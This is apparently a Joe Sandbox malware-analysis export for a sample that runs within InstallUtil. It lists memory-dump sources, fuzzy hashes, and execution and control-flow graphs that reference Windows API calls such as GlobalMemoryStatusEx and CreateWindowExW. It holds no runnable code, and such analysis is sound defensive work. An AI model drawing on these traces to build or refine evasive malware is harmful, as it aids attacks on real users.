                                                                                                            • Instruction Fuzzy Hash: 78319BB1D016588BEB58CF6BCC4578EFBF3AFC8304F54C1AAC418A6254EB7406468F41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362950294.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f70000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 75f30d8fe39e3b12b0c9724313662ebede761d2a11933b0425ede05532d68690
                                                                                                            • Instruction ID: a67b566e9fd1b80d383a6cd75994587f8c46afa3e1d91c41169301eb6f5bdd18
                                                                                                            • Opcode Fuzzy Hash: 75f30d8fe39e3b12b0c9724313662ebede761d2a11933b0425ede05532d68690
                                                                                                            • Instruction Fuzzy Hash: BD21FB71D056588BEB58CF6BC8442D9FBB7AFC9304F04C0AAD809AA229DB304A45CE40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362950294.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f70000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 221c2b4904d745efd42ba032e009dcc4cb14f3621e8e4e1f192e84ab5bc38759
                                                                                                            • Instruction ID: 342ece8182a87c10d585e36356b23ba124a507969bc8b3d058eb97b65e983d21
                                                                                                            • Opcode Fuzzy Hash: 221c2b4904d745efd42ba032e009dcc4cb14f3621e8e4e1f192e84ab5bc38759
                                                                                                            • Instruction Fuzzy Hash: ED219771D056588FEB58CF5BC9446D9BAF7ABD9304F04C0AA9809AA268DB344945CE40

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:10.6%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:183
                                                                                                            Total number of Limit Nodes:20
                                                                                                            execution_graph 42091 cf09dd 42092 cf09ee 42091->42092 42093 cf084e 42091->42093 42093->42091 42094 cf091b 42093->42094 42099 6231d00 42093->42099 42103 6231cf0 42093->42103 42107 cf1391 42093->42107 42111 cf1388 42093->42111 42100 6231d0f 42099->42100 42115 6231464 42100->42115 42104 6231d00 42103->42104 42105 6231464 3 API calls 42104->42105 42106 6231d30 42105->42106 42106->42093 42109 cf1396 42107->42109 42108 cf1480 42108->42093 42109->42108 42234 cf7ea0 42109->42234 42113 cf138b 42111->42113 42112 cf1480 42112->42093 42113->42112 42114 cf7ea0 GlobalMemoryStatusEx 42113->42114 42114->42113 42116 623146f 42115->42116 42119 6232bcc 42116->42119 42118 62336b6 42120 6232bd7 42119->42120 42121 6233ddc 42120->42121 42124 6235a66 42120->42124 42128 6235a68 42120->42128 42121->42118 42126 6235a89 42124->42126 42125 6235aad 42125->42121 42126->42125 42132 6235c18 42126->42132 42129 6235a89 42128->42129 42130 6235aad 42129->42130 42131 6235c18 3 API calls 42129->42131 42130->42121 42131->42130 42133 6235c25 42132->42133 42135 6235c5e 42133->42135 42136 6234e28 42133->42136 42135->42125 42137 6234e33 42136->42137 42139 6235cd0 42137->42139 42140 6234e5c 42137->42140 42139->42139 42141 6234e67 42140->42141 42147 6234e6c 42141->42147 42143 6235d3f 42151 623b050 42143->42151 42160 623b038 42143->42160 42144 6235d79 42144->42139 42150 6234e77 42147->42150 42148 6236fc8 42148->42143 42149 6235a68 3 API calls 42149->42148 42150->42148 42150->42149 42153 623b081 42151->42153 42155 623b181 42151->42155 42152 623b08d 42152->42144 42153->42152 42169 623b2b8 42153->42169 42173 623b2c8 42153->42173 42154 623b0cd 42177 623c5b9 42154->42177 42187 623c5c8 42154->42187 42155->42144 42162 623b081 42160->42162 42163 623b181 42160->42163 42161 623b08d 42161->42144 42162->42161 42165 623b2b8 3 API calls 42162->42165 42166 623b2c8 3 API calls 42162->42166 42163->42144 42164 623b0cd 42167 623c5b9 GetModuleHandleW 42164->42167 42168 623c5c8 GetModuleHandleW 42164->42168 42165->42164 42166->42164 42167->42163 42168->42163 42197 623b308 42169->42197 42206 623b318 42169->42206 42170 623b2d2 42170->42154 42174 623b2d2 42173->42174 42175 623b308 2 API calls 42173->42175 42176 623b318 2 API calls 42173->42176 42174->42154 42175->42174 42176->42174 42178 623c5f3 42177->42178 42215 623a37c 42178->42215 42181 623c676 42183 623c6a2 42181->42183 42230 623a2ac 42181->42230 42186 623a37c GetModuleHandleW 42186->42181 42188 623c5f3 42187->42188 42189 623a37c GetModuleHandleW 42188->42189 42190 623c65a 42189->42190 42194 623cb20 GetModuleHandleW 42190->42194 42195 623ca78 GetModuleHandleW 42190->42195 42196 623a37c GetModuleHandleW 42190->42196 42191 623c676 42192 623a2ac GetModuleHandleW 42191->42192 42193 623c6a2 42191->42193 42192->42193 42194->42191 42195->42191 42196->42191 42198 623b30d 42197->42198 42199 623a2ac GetModuleHandleW 42198->42199 42201 623b34c 42198->42201 42200 623b334 42199->42200 42200->42201 42205 623b5a2 GetModuleHandleW 42200->42205 42201->42170 42202 623b550 GetModuleHandleW 42204 623b57d 42202->42204 42203 623b344 42203->42201 42203->42202 42204->42170 42205->42203 42207 623b329 42206->42207 42210 623b34c 42206->42210 42208 623a2ac GetModuleHandleW 42207->42208 42209 623b334 42208->42209 42209->42210 42214 623b5a2 GetModuleHandleW 42209->42214 42210->42170 42211 623b550 GetModuleHandleW 42213 623b57d 42211->42213 42212 623b344 42212->42210 42212->42211 42213->42170 42214->42212 42216 623a387 42215->42216 42217 623c65a 42216->42217 42218 623cc80 GetModuleHandleW 42216->42218 42219 623cc90 GetModuleHandleW 42216->42219 42217->42186 42220 623ca78 42217->42220 42225 623cb20 42217->42225 42218->42217 42219->42217 42221 623ca88 42220->42221 42222 623ca93 42221->42222 42223 623cc80 GetModuleHandleW 42221->42223 42224 623cc90 GetModuleHandleW 42221->42224 42222->42181 42223->42222 42224->42222 42227 623cb4d 42225->42227 42226 623cbce 42227->42226 42228 623cc80 GetModuleHandleW 42227->42228 42229 623cc90 GetModuleHandleW 42227->42229 42228->42226 42229->42226 42231 623b508 GetModuleHandleW 42230->42231 42233 623b57d 42231->42233 42233->42183 42235 cf7eaa 42234->42235 42236 cf7ec4 42235->42236 42239 624fab8 42235->42239 42243 624faa9 42235->42243 42236->42109 42240 624facd 42239->42240 42241 624fce2 42240->42241 42242 624fcf7 GlobalMemoryStatusEx 42240->42242 42241->42236 42242->42240 42245 624fab8 42243->42245 42244 624fce2 42244->42236 42245->42244 42246 624fcf7 GlobalMemoryStatusEx 42245->42246 42246->42245 42247 6233050 DuplicateHandle 42248 62330e6 42247->42248 42249 623d4f0 42250 623d558 CreateWindowExW 42249->42250 42252 623d614 42250->42252 42252->42252 42253 cad030 42254 cad048 42253->42254 42255 cad0a2 42254->42255 42260 623d697 42254->42260 42264 623a48c 42254->42264 42273 623d6a8 42254->42273 42277 623e7f8 42254->42277 42261 623d6a5 42260->42261 42262 623a48c CallWindowProcW 42261->42262 42263 623d6ef 42262->42263 42263->42255 42265 623a497 42264->42265 42266 623e869 42265->42266 42268 623e859 42265->42268 42269 623e867 42266->42269 42302 623e46c 42266->42302 42286 623ea5c 42268->42286 42292 623e990 42268->42292 42297 623e980 42268->42297 42274 623d6ce 42273->42274 42275 623a48c CallWindowProcW 42274->42275 42276 623d6ef 42275->42276 42276->42255 42280 623e835 42277->42280 42278 623e869 42279 623e46c CallWindowProcW 42278->42279 42282 623e867 42278->42282 42279->42282 42280->42278 42281 623e859 42280->42281 42283 623e980 CallWindowProcW 42281->42283 42284 623e990 CallWindowProcW 42281->42284 42285 623ea5c CallWindowProcW 42281->42285 42283->42282 42284->42282 42285->42282 42287 623ea1a 42286->42287 42288 623ea6a 42286->42288 42306 623ea38 42287->42306 42310 623ea48 42287->42310 42289 623ea30 42289->42269 42294 623e9a4 42292->42294 42293 623ea30 42293->42269 42295 623ea38 CallWindowProcW 42294->42295 42296 623ea48 CallWindowProcW 42294->42296 42295->42293 42296->42293 42299 623e991 42297->42299 42298 623ea30 42298->42269 42300 623ea38 CallWindowProcW 42299->42300 42301 623ea48 CallWindowProcW 42299->42301 42300->42298 42301->42298 42303 623e477 42302->42303 42304 623fcca CallWindowProcW 42303->42304 42305 623fc79 42303->42305 42304->42305 42305->42269 42307 623ea48 42306->42307 42308 623ea59 42307->42308 42313 623fc00 42307->42313 42308->42289 42311 623ea59 42310->42311 42312 623fc00 CallWindowProcW 42310->42312 42311->42289 42312->42311 42314 623e46c CallWindowProcW 42313->42314 42315 623fc1a 42314->42315 42315->42308
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cc8586c07348967ab630f64412884bbe8c5ff9de349cd26dc5a6b90b1ce41a7e
                                                                                                            • Instruction ID: 59ee2957617e624339dd9310ce671d175f6290d2682f620049c25cada28953a7
                                                                                                            • Opcode Fuzzy Hash: cc8586c07348967ab630f64412884bbe8c5ff9de349cd26dc5a6b90b1ce41a7e
                                                                                                            • Instruction Fuzzy Hash: E3D25B30E21206CFDB68EF65C484A9DB7B2FF85310F54C5A9E809AB255EB71ED81CB40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f1b70e17d37cc3b459d9a41aa1929d3798035f58ce86eaa70c36f46cc0a7b3b6
                                                                                                            • Instruction ID: f4e24a099b99f738341c8d2f4f5db60923072f28d829f7bfe657641285bf3d2f
                                                                                                            • Opcode Fuzzy Hash: f1b70e17d37cc3b459d9a41aa1929d3798035f58ce86eaa70c36f46cc0a7b3b6
                                                                                                            • Instruction Fuzzy Hash: B2628E34B202068FDB58EB68D594BADB7F2EF89310F148469E806DB355DB35ED45CB80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8f086071705cc9be970758ed849588fe53f05a7645e91b02818ae2dd5e3a68a7
                                                                                                            • Instruction ID: 3bc4ef6c7d5ddb1cf9c8cc5f0a7172bd96160c11deb825c21725b4b2f8ae8622
                                                                                                            • Opcode Fuzzy Hash: 8f086071705cc9be970758ed849588fe53f05a7645e91b02818ae2dd5e3a68a7
                                                                                                            • Instruction Fuzzy Hash: 6A526270E2020A8FEF68EB68D5907ADB7B2EF89311F208529E805DB395DB35DD41CB51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 30042dc178759fa50754b9f9a515ac3aacdd7635dc2ccc461a275dac52890026
                                                                                                            • Instruction ID: 569de7d6633a4a04d4dc33036869c3c77841ef14d245c7a78c8e35bd685c5927
                                                                                                            • Opcode Fuzzy Hash: 30042dc178759fa50754b9f9a515ac3aacdd7635dc2ccc461a275dac52890026
                                                                                                            • Instruction Fuzzy Hash: F332A235B212068FDF59EB6CD890BADB7B2EB89310F108565E905EB355DB31DC41CB90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 3311 6245640-624565d 3312 624565f-6245662 3311->3312 3313 6245664-624566a 3312->3313 3314 6245675-6245678 3312->3314 3315 62457e6-62457f0 3313->3315 3316 6245670 3313->3316 3317 6245682-6245685 3314->3317 3318 624567a-624567d 3314->3318 3321 62457f7-62457f9 3315->3321 3316->3314 3319 6245687-6245690 3317->3319 3320 624569b-624569e 3317->3320 3318->3317 3322 6245784-624578d 3319->3322 3323 6245696 3319->3323 3324 62456a0-62456a6 3320->3324 3325 62456b1-62456b4 3320->3325 3328 62457fe-6245801 3321->3328 3329 6245827-6245853 3322->3329 3330 6245793-624579b 3322->3330 3323->3320 3331 62456ac 3324->3331 3332 6245748-624574b 3324->3332 3326 62456c5-62456c8 3325->3326 3327 62456b6-62456ba 3325->3327 3336 62456ec-62456ef 3326->3336 3337 62456ca-62456e7 3326->3337 3333 62456c0 3327->3333 3334 6245819-6245826 3327->3334 3328->3313 3335 6245807-6245809 3328->3335 3359 624585d-6245860 3329->3359 3330->3329 3338 62457a1-62457b1 3330->3338 3331->3325 3339 6245750-6245753 3332->3339 3333->3326 3340 6245810-6245813 3335->3340 3341 624580b 3335->3341 3346 62456f1-62456f6 3336->3346 3347 62456f9-62456fc 3336->3347 3337->3336 3338->3329 3342 62457b3-62457b7 3338->3342 3343 6245755-624575e 3339->3343 3344 624575f-6245762 3339->3344 3340->3312 3340->3334 3341->3340 3349 62457bc-62457bf 3342->3349 3352 6245764-6245771 3344->3352 3353 6245776-6245779 3344->3353 3346->3347 3350 62456fe-6245713 3347->3350 3351 6245718-624571b 3347->3351 3357 62457d4-62457d7 3349->3357 3358 62457c1-62457cf 3349->3358 3350->3351 3354 6245732-6245735 3351->3354 3355 624571d-624572d 3351->3355 3352->3353 3353->3319 3356 624577f-6245782 3353->3356 3361 6245737-624573e 3354->3361 3362 6245743-6245746 3354->3362 3355->3354 3356->3322 3356->3349 3366 62457e1-62457e4 3357->3366 3367 62457d9-62457dc 3357->3367 3358->3357 3364 6245874-6245877 3359->3364 3365 6245862-6245869 3359->3365 3361->3362 3362->3332 3362->3339 3373 6245899-624589c 3364->3373 3374 6245879-624587d 3364->3374 3371 624586f 3365->3371 3372 624594a-6245951 3365->3372 3366->3315 3366->3328 3367->3366 3371->3364 3377 62458be-62458c1 3373->3377 3378 624589e-62458a2 3373->3378 3375 6245952-624598b 3374->3375 3376 6245883-624588b 3374->3376 3392 624598d-6245990 3375->3392 3376->3375 3379 6245891-6245894 3376->3379 3381 62458c3-62458c7 3377->3381 3382 62458df-62458e2 3377->3382 3378->3375 3380 62458a8-62458b0 3378->3380 3379->3373 3380->3375 3383 62458b6-62458b9 3380->3383 3381->3375 3384 62458cd-62458d5 3381->3384 3385 62458e4-62458e8 3382->3385 3386 62458fc-62458ff 3382->3386 3383->3377 3384->3375 3388 62458d7-62458da 3384->3388 3385->3375 3389 62458ea-62458f2 3385->3389 3390 6245910-6245913 3386->3390 3391 6245901-624590b 3386->3391 3388->3382 3389->3375 3397 62458f4-62458f7 3389->3397 3395 6245915-624591c 3390->3395 3396 624591d-6245920 3390->3396 3391->3390 3393 6245992-62459a4 3392->3393 3394 62459af-62459b2 3392->3394 3408 6245cb3-6245cc5 3393->3408 3409 62459aa 3393->3409 3399 6245c72-6245c75 3394->3399 3400 62459b8-6245b24 3394->3400 3401 6245922-6245933 3396->3401 3402 6245938-624593a 3396->3402 3397->3386 3404 6245c77-6245c89 3399->3404 3405 6245c90-6245c93 3399->3405 3460 6245c5c-6245c6f 3400->3460 3461 6245b2a-6245b31 3400->3461 3401->3402 3406 6245941-6245944 3402->3406 3407 624593c 3402->3407 3418 6245cf9-6245cfe 3404->3418 3419 6245c8b 3404->3419 3410 6245c95-6245ca7 3405->3410 3411 6245cae-6245cb1 3405->3411 3406->3359 3406->3372 3407->3406 3408->3418 3427 6245cc7 3408->3427 3409->3394 3410->3418 3426 6245ca9 3410->3426 3411->3408 3415 6245ccc-6245ccf 3411->3415 3416 6245cd6-6245cd9 3415->3416 3417 6245cd1-6245cd3 3415->3417 3423 6245cf4-6245cf7 3416->3423 3424 6245cdb-6245ced 3416->3424 3417->3416 3425 6245d01-6245d04 3418->3425 3419->3405 3423->3418 3423->3425 3433 6245d1c-6245d2f 3424->3433 3434 6245cef 3424->3434 3428 6245d06-6245d0b 3425->3428 3429 6245d0e-6245d11 3425->3429 3426->3411 3427->3415 3428->3429 3429->3400 3432 6245d17-6245d1a 3429->3432 3432->3433 3435 6245d32-6245d35 3432->3435 3434->3423 3435->3400 3437 6245d3b-6245d3d 3435->3437 3438 6245d44-6245d47 3437->3438 3439 6245d3f 3437->3439 3438->3392 3442 6245d4d-6245d56 3438->3442 3439->3438 3462 6245be4-6245beb 3461->3462 3463 6245b37-6245b69 3461->3463 3462->3460 3465 6245bed-6245c20 3462->3465 3474 6245b6e-6245baf 3463->3474 3475 6245b6b 3463->3475 3476 6245c25-6245c52 3465->3476 3477 6245c22 3465->3477 3485 6245bc7-6245bce 3474->3485 3486 6245bb1-6245bc2 3474->3486 3475->3474 3476->3442 3477->3476 3488 6245bd6-6245bd8 3485->3488 3486->3442 3488->3442
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 821f36fb5300b72ff702c4d9f2e2c3adc312497bbdca9eef0cad211d6cc57db8
                                                                                                            • Instruction ID: d1a7280c0cdf3ea2fc44f7611a9f21633fa4d97cf718527f77e235c79ee4db86
                                                                                                            • Opcode Fuzzy Hash: 821f36fb5300b72ff702c4d9f2e2c3adc312497bbdca9eef0cad211d6cc57db8
                                                                                                            • Instruction Fuzzy Hash: 2212E571F202169BDF68EB64D48066EB7B6EF85310F248439DC96EB385DA35DC41CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5d17fea785c492648b784b461a0685e7d500e6b293c89ffb204be5d22dd2edb8
                                                                                                            • Instruction ID: 0c74cf21a21709704af0f8b26d7d395753b92ad43b53afa7483281bb895d8cc2
                                                                                                            • Opcode Fuzzy Hash: 5d17fea785c492648b784b461a0685e7d500e6b293c89ffb204be5d22dd2edb8
                                                                                                            • Instruction Fuzzy Hash: 0902A230B212068FDB58EB68D8907AEB7F6FF85300F248569D9159B385DB35ED42CB80

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 515 623b318-623b327 516 623b353-623b357 515->516 517 623b329-623b336 call 623a2ac 515->517 519 623b36b-623b3ac 516->519 520 623b359-623b363 516->520 522 623b338-623b346 call 623b5a2 517->522 523 623b34c 517->523 526 623b3b9-623b3c7 519->526 527 623b3ae-623b3b6 519->527 520->519 522->523 533 623b488-623b548 522->533 523->516 528 623b3eb-623b3ed 526->528 529 623b3c9-623b3ce 526->529 527->526 534 623b3f0-623b3f7 528->534 531 623b3d0-623b3d7 call 623a2b8 529->531 532 623b3d9 529->532 536 623b3db-623b3e9 531->536 532->536 566 623b550-623b57b GetModuleHandleW 533->566 567 623b54a-623b54d 533->567 537 623b404-623b40b 534->537 538 623b3f9-623b401 534->538 536->534 540 623b418-623b421 call 6233934 537->540 541 623b40d-623b415 537->541 538->537 546 623b423-623b42b 540->546 547 623b42e-623b433 540->547 541->540 546->547 548 623b451-623b45e 547->548 549 623b435-623b43c 547->549 556 623b481-623b487 548->556 557 623b460-623b47e 548->557 549->548 551 623b43e-623b44e call 6238af8 call 623a2c8 549->551 551->548 557->556 568 623b584-623b598 566->568 569 623b57d-623b583 566->569 567->566 569->568
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3368934724.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6230000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 9f4eb95ea4dcf17829abc30a1d08e835c7276b2bec4f424f0fcbd85f94711268
                                                                                                            • Instruction ID: 7e882a191a2d4f64ff5c3f5bff1222b12160c1040618d8ae06bfa392edb73cc4
                                                                                                            • Opcode Fuzzy Hash: 9f4eb95ea4dcf17829abc30a1d08e835c7276b2bec4f424f0fcbd85f94711268
                                                                                                            • Instruction Fuzzy Hash: CF8179B0A10B158FDB64DF2AD45075ABBF1FF88301F008A2ED89AC7A50D775E845CB90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 676 cfe998-cfe9b3 678 cfe9dd-cfe9e0 676->678 679 cfe9b5-cfe9dc 676->679 680 cfe9e1-cfe9fc call cfe1f4 678->680 685 cfe9fe-cfea01 680->685 686 cfea02-cfea54 680->686 686->680 691 cfea56-cfea61 686->691 692 cfea67-cfeaf4 GlobalMemoryStatusEx 691->692 693 cfea63-cfea66 691->693 696 cfeafd-cfeb25 692->696 697 cfeaf6-cfeafc 692->697 697->696
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3360659394.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_cf0000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dd8043197ddf51cae785da20469a9e53d4c80141a6c805037ac39076a3111fdd
                                                                                                            • Instruction ID: f0fb1fc1fe5cd4ef85ef22399a475c99f8042a7db2338842bbb9aef170506d6d
                                                                                                            • Opcode Fuzzy Hash: dd8043197ddf51cae785da20469a9e53d4c80141a6c805037ac39076a3111fdd
                                                                                                            • Instruction Fuzzy Hash: BA417672E083998FCB10CFB9D8106EEBFF0AF89310F18816BD544A7251D7789944CBA2

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 700 623d4e4-623d556 702 623d561-623d568 700->702 703 623d558-623d55e 700->703 704 623d573-623d5ab 702->704 705 623d56a-623d570 702->705 703->702 706 623d5b3-623d612 CreateWindowExW 704->706 705->704 707 623d614-623d61a 706->707 708 623d61b-623d653 706->708 707->708 712 623d660 708->712 713 623d655-623d658 708->713 714 623d661 712->714 713->712 714->714
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0623D602
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3368934724.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6230000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 5633bb3c13bf9211f187e5e00942d7b6e4f0db536278fb1a683682e390aadb47
                                                                                                            • Instruction ID: 619fed06cff4707566a90abc3cc0866e91789cf4dfd94d867f05ab017c742cf3
                                                                                                            • Opcode Fuzzy Hash: 5633bb3c13bf9211f187e5e00942d7b6e4f0db536278fb1a683682e390aadb47
                                                                                                            • Instruction Fuzzy Hash: 0751D0B1D10359DFDB14CFA9D884ADEBFB5BF88310F24852AE819AB210D771A845CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 715 623d4f0-623d556 716 623d561-623d568 715->716 717 623d558-623d55e 715->717 718 623d573-623d612 CreateWindowExW 716->718 719 623d56a-623d570 716->719 717->716 721 623d614-623d61a 718->721 722 623d61b-623d653 718->722 719->718 721->722 726 623d660 722->726 727 623d655-623d658 722->727 728 623d661 726->728 727->726 728->728
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0623D602
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3368934724.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6230000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: b9c58df80bb81d8429033519c35ac95777d9b4523f72c8c42e0f951e56df8aa4
                                                                                                            • Instruction ID: 57e61e4bf22212de69c3bf21f7d5ee971d1b0e1bc55d48b1fc11b1282ab98878
                                                                                                            • Opcode Fuzzy Hash: b9c58df80bb81d8429033519c35ac95777d9b4523f72c8c42e0f951e56df8aa4
                                                                                                            • Instruction Fuzzy Hash: 0B41C0B1D10359DFDB14CF99D884ADEBFB5BF88310F24852AE819AB210D774A845CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 729 623e46c-623fc6c 732 623fc72-623fc77 729->732 733 623fd1c-623fd3c call 623a48c 729->733 735 623fcca-623fd02 CallWindowProcW 732->735 736 623fc79-623fcb0 732->736 740 623fd3f-623fd4c 733->740 738 623fd04-623fd0a 735->738 739 623fd0b-623fd1a 735->739 743 623fcb2-623fcb8 736->743 744 623fcb9-623fcc8 736->744 738->739 739->740 743->744 744->740
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0623FCF1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3368934724.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6230000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: 1f4c1c868d0147f5d9601b15877a7b399319d1dd5f9be6aace9e5e44868b9e25
                                                                                                            • Instruction ID: 281f7c3fea5456b656537905b0e69aaa1938b00ba86edcba4fa62d5adf6d975c
                                                                                                            • Opcode Fuzzy Hash: 1f4c1c868d0147f5d9601b15877a7b399319d1dd5f9be6aace9e5e44868b9e25
                                                                                                            • Instruction Fuzzy Hash: 7F4158B4D10319CFDB54CF99D948AAABBF5FF88314F24C859D919AB321C374A841CBA0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 746 6233048-62330e4 DuplicateHandle 747 62330e6-62330ec 746->747 748 62330ed-623310a 746->748 747->748
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 062330D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3368934724.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6230000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 489af3279260d179d7e3f080221a94d75724d721b2e44b175e542fa04fba18ce
                                                                                                            • Instruction ID: 39ec09cee6b0ba8bc070cc8a3e70451a3dafd6ec4155c8361e2f30bbb3b186c1
                                                                                                            • Opcode Fuzzy Hash: 489af3279260d179d7e3f080221a94d75724d721b2e44b175e542fa04fba18ce
                                                                                                            • Instruction Fuzzy Hash: 9E2100B5D00259DFDB10CFAAD884AEEBBF4EB48310F14801AE918A3310D379A950CFA0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 751 6233050-62330e4 DuplicateHandle 752 62330e6-62330ec 751->752 753 62330ed-623310a 751->753 752->753
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 062330D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3368934724.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6230000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
